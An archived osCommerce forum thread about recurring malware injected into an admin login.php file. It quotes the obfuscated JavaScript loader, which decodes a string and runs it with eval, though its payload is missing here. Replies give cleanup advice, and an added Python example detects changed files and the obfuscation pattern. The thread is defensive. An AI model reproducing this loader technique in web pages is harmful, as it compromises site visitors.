
osCommerce

The e-commerce.

login.php malware code injected / inserted


sactown


Posted

I am running 2.2rc2, but I have been keeping it updated with bug updates and patches, like the ones pinned to this forum and the update guides. Here is the code I keep getting weekly injected back into my admin login.php file. Anyone else getting this also?

 

The file's date does not get modified. This seems like the only file affected.

 

<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF" onload="SetFocus();"><ad><script type='text/javascript'>this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this.u=false;this.o="jP";this.j=false;this.k="gZ";this.s=false;d="";for(a=0;a<c["le"+unescape("%6e%67%74%68")];a++){this.H= this.h="";this.P=43510;this.r=this.z="";this.v=37015;this.F="qY";this.L=62857;this.g="eS";e=c["char"+unescape("%43%6f%64%65%41%74")](a);this.D=false;e^=232;this.q=36524;d+=h(e);this.R=this.p=""}this.f="dX";this.a="";g["e"+unescape("%76%61%6c")](d);this.t=this.K=false;return d})("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"); this.n=3279;this.O=58441;</script></ad><b1><!--f9mYZ4E7eNrTT07MycksKdfPSMxNSczL1M/JT8/M0yvIKLC1tTU0MjMyszAzNTUGABfJDKI=--></b1>
<!-- header //-->
<?php require(DIR_WS_INCLUDES . 'header.php'); ?>
<!-- header_eof //-->
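The post above reports that the injected login.php keeps its old date, so checking modification times will not reveal the change. The following is an added example, not part of the original thread: a content-hash baseline for the admin folder, plus a heuristic for the unescape()-concatenation style seen in the pasted script. The function names and sample files are constructed for illustration.

```python
import hashlib
import os
import re
import tempfile
from pathlib import Path

# Heuristic for the style of the pasted script: names rebuilt as "..." + unescape("%xx").
OBFUSCATED_JS = re.compile(r'"\s*\+\s*unescape\(\s*"(?:%[0-9a-fA-F]{2})+"\s*\)')

def snapshot(root):
    """Map each file under root (relative path) to the SHA-256 of its contents."""
    root = Path(root)
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }

def compare(baseline, current):
    """Return files whose content changed, appeared, or disappeared since baseline."""
    return {
        "changed": sorted(f for f in baseline if f in current and baseline[f] != current[f]),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }

def looks_injected(path):
    """True if the file contains the unescape()-concatenation pattern."""
    return bool(OBFUSCATED_JS.search(Path(path).read_text(errors="replace")))

def demo():
    """Constructed scenario: login.php content changes while its date stays the same."""
    with tempfile.TemporaryDirectory() as admin:
        login = Path(admin, "login.php")
        login.write_text('<body onload="SetFocus();">\n<!-- header //-->\n')
        Path(admin, "index.php").write_text("<?php // untouched ?>\n")
        baseline = snapshot(admin)
        before = login.stat()
        # Constructed, inert stand-in for the injected script (no payload).
        login.write_text('<body onload="SetFocus();"><script>'
                         'var d=window["unescap"+unescape("%65")];</script>\n')
        # Reproduce the unchanged date reported in the post.
        os.utime(login, ns=(before.st_atime_ns, before.st_mtime_ns))
        same_date = login.stat().st_mtime_ns == before.st_mtime_ns
        report = compare(baseline, snapshot(admin))
        return same_date, report, looks_injected(login)

if __name__ == "__main__":
    print(demo())
```

Take the baseline from a known-clean copy and keep it off the server; running the comparison on a schedule also narrows the time window to look at in the FTP and site logs.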

Posted

Moses,

 

If you have patched your site and are still getting hacked, it is because the hacker has:

 

1) Added a backdoor to your server to access it anytime.

2) Your FTP password to access your server anytime.

 

 

 

 

Chris

Posted

Have a look at the FTP access logs and site logs at the time the file is updated.

 

Maybe you can see something suspicious.

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Posted

I use GoDaddy Hosting. I will try to email their support for the FTP logs. Not sure if I have to pay for other site stats, but I will look into it. I also scanned my computers for adware/malware/viruses with a couple of different programs just to make sure it is not my computers, and I got nothing.

Posted

It does sound like they've gotten in through a security flaw on the server or gained access through FTP or maybe even the hosting control panel.

 

If you haven't done the following already....

 

1. Contact your hosting immediately about the problem, if you can't access the logs, they sure can.

2. Change your FTP password.

3. Add/modify the .htaccess file in the admin folder to limit access by password or IP address. At least then it will stop rogue bots scouring the admin folder.

4. Remove the File_Manager.php file from your admin folder. This has been a well documented issue.

Posted

Filemanager was only an issue because of the login workaround.

 

If the site is secure, file manager is fine to be on the server.

 

Personally I remove it because I always edit locally on a copy.

 

Cheers

 

G


Archived

This topic is now archived and is closed to further replies.
